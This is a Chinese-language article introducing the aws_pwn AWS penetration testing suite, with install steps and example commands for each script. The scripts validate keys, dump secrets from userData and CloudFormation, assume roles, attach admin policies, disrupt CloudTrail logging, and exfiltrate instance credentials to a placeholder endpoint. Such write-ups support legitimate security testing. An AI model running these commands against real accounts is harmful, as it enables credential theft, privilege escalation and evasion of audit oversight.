关于aws_pwn
aws_pwn是一款功能强大的AWS渗透测试套件,该套件由多种工具脚本组成,可以帮助广大研究人员执行与AWS渗透测试相关的各种任务。
工具下载
由于该工具基于Python开发,因此我们首先需要在本地设备上安装并配置好Python环境。
接下来,广大研究人员可以使用下列命令将该项目源码克隆至本地:
git clone https://github.com/dagrz/aws_pwn.git
然后切换到项目目录中,使用pip命令和项目提供的requirements.txt文件安装该工具所需的依赖组件:
cd aws_pwn pip install -r requirements.txt
最后,你还需要在~/.aws/credentials文件中配置你的AWS凭证信息。
工具使用
网络侦查
validate_iam_access_keys.py这个脚本能够接收一个TSV文件(访问密钥) 敏感数据( 会话)组合作为输入参数,并能够检查访问有效性并返回主体的身份信息:
./validate_iam_access_keys.py -i /tmp/keys.txt -o /tmp/out.json
validate_s3_buckets.py脚本能够接收一个文本文件(每行一个单词)作为输入,并检测目标Bucket是否存在,然后返回基本标识信息:
./validate_s3_buckets.py -i /tmp/words.txt -o /tmp/out.json
validate_iam_principals.py脚本能够根据给定主体的文本文件(例如用户/admin,角色/deploy)来检查主体是否存在于给定帐户中:
./validate_iam_principals.py -a 123456789012 -i /tmp/words.txt -o /tmp/out.json
validate_accounts.py脚本可以根据给定一个包含帐户ID和帐户别名的文本文件来检查帐户是否存在:
./validate_accounts.py -i /tmp/accounts.txt -o /tmp/out.json
隐蔽行为
disrupt_cloudtrail.py脚本将尝试以指定方式中断/削弱cloudtrail日志记录:
./disrupt_cloudtrail.py -s
漏洞利用
dump_account_data.sh脚本能够调用一组基于帐户的通用read/list/get/descripte函数,并将数据保存到给定的位置:
./dump_account_data.sh /tmp/
权限提升
dump_instance_attributes.py脚本能够遍历帐户中的每个EC2实例并检索指定的实例属性。最常用于检索userData,其中往往包含敏感信息:
./dump_instance_attributes.py -u -o /tmp/
dump_cloudformation_stack_descriptions.py脚本可以检索每个现有堆栈和最近90天内删除的每个堆栈的堆栈说明。堆栈描述中的参数通常包含密码和其他敏感信息:
./dump_cloudformation_stack_descriptions.py -o /tmp/data
assume_roles.py脚本将尝试获取文件中或列表API提供的所有角色(ARN):
./assume_roles.py -o /tmp/out.json
add_iam_policy.py脚本会将管理员和所有操作策略添加到给定的用户、角色或组,此时需要IAM putPolicy或attachPolicy权限:
./add_iam_policy.py -u myuser -r myrole -g mygroup
bouncy_bouncy_cloudy_cloud.py脚本能够跳出给定的EC2实例并重写其userData,以便运行任意代码或窃取临时实例配置文件凭据:
./bouncy_bouncy_cloudy_cloud.py -i instance-id -e exfiltration-endpoint
项目地址
aws_pwn:【GitHub传送门】
内容出处:,
声明:本网站所收集的部分公开资料来源于互联网,转载的目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。如果您发现网站上有侵犯您的知识产权的作品,请与我们取得联系,我们会及时修改或删除。文章链接:http://www.yixao.com/soft/30766.html
微信扫一扫
支付宝扫一扫
相关推荐
-
微软Win10 Dev预览版 21292 发布
微软近期发布了 Windows 10 Dev 预览版 build 21292,它为任务栏上的新闻和兴趣的新快捷方式带来了各种修复。 这个任务栏上的新闻和兴趣功能在上周的 Windo…
-
Fedora34正式版发布 迎来多项令人振奋的更新
Fedora 34 已经正式发布,它在功能方面的升级相当令人激动,尤其是在 Fedora 工作站版 34 中的变化。首先,Fedora 34 已经成功地从 PulseAudio 切…
-
Adobe Flash Player v26.0.137正式版
Adobe Flash Player是个跨平台、基于浏览器的flash视频播放器,是PC上看网络视频必备插件。它可以跨屏幕和浏览器原汁原味地查看具有表现力的应用程序、内容和视频。F…
-
11个应用软件推荐,关键的时候用得着
在日常生活中,如果我们仅仅是靠别人的输出来提升自己,这往往都是不够的;所以我们就必须通过线上的软件来丰富自己。而当我们想要了解学习一些东西不知道去哪儿找时,可能这些app能够帮助到…
-
基于Redis+Lua实现分布式限流组件
limit-spring-boot-starter limit-spring-boot-starter是一个基于springboot starter机制,结合SPI 接口设计思想(…
-
2020年11月 Windows10 LTSC 激活密钥
至到2020.11.2,可在线激活的次数5470,其它版本直接数字激活即可。 Win 10 RTM EnterpriseS (LTSC 2019) Volume:MAK onlin…
-
ChartCube:阿里出品的免费在线图表制作工具,简单好用还漂亮
优秀生产力应用推荐!几分钟就能制作出一个专业美观的数据图表。 关于 ChartCube 图表魔方 ChartCube 中文名也叫图表魔方,是阿里巴巴数据可视化团队(AntV)出品的…
-
蓝鲸作业平台[bk-job]:腾讯开源的良心项目
哈喽,大家好,我是开源君,一个资深的互联网玩家,致力于为大家分享各领域优质开源项目。 又到周末了,祝大家周末愉快,之前有读者问,开源君周末都在干啥呢? 今天给大家回答一下,读书、刷…
-
ClickHouse可视化工具DBM
DBM是ClickHouse可视化数据工具。它基于ClickHouse原生Http请求构建,支持大量ClickHouse工作,主要支持以下功能点: 支持仪表盘展示服务使用状态 支持…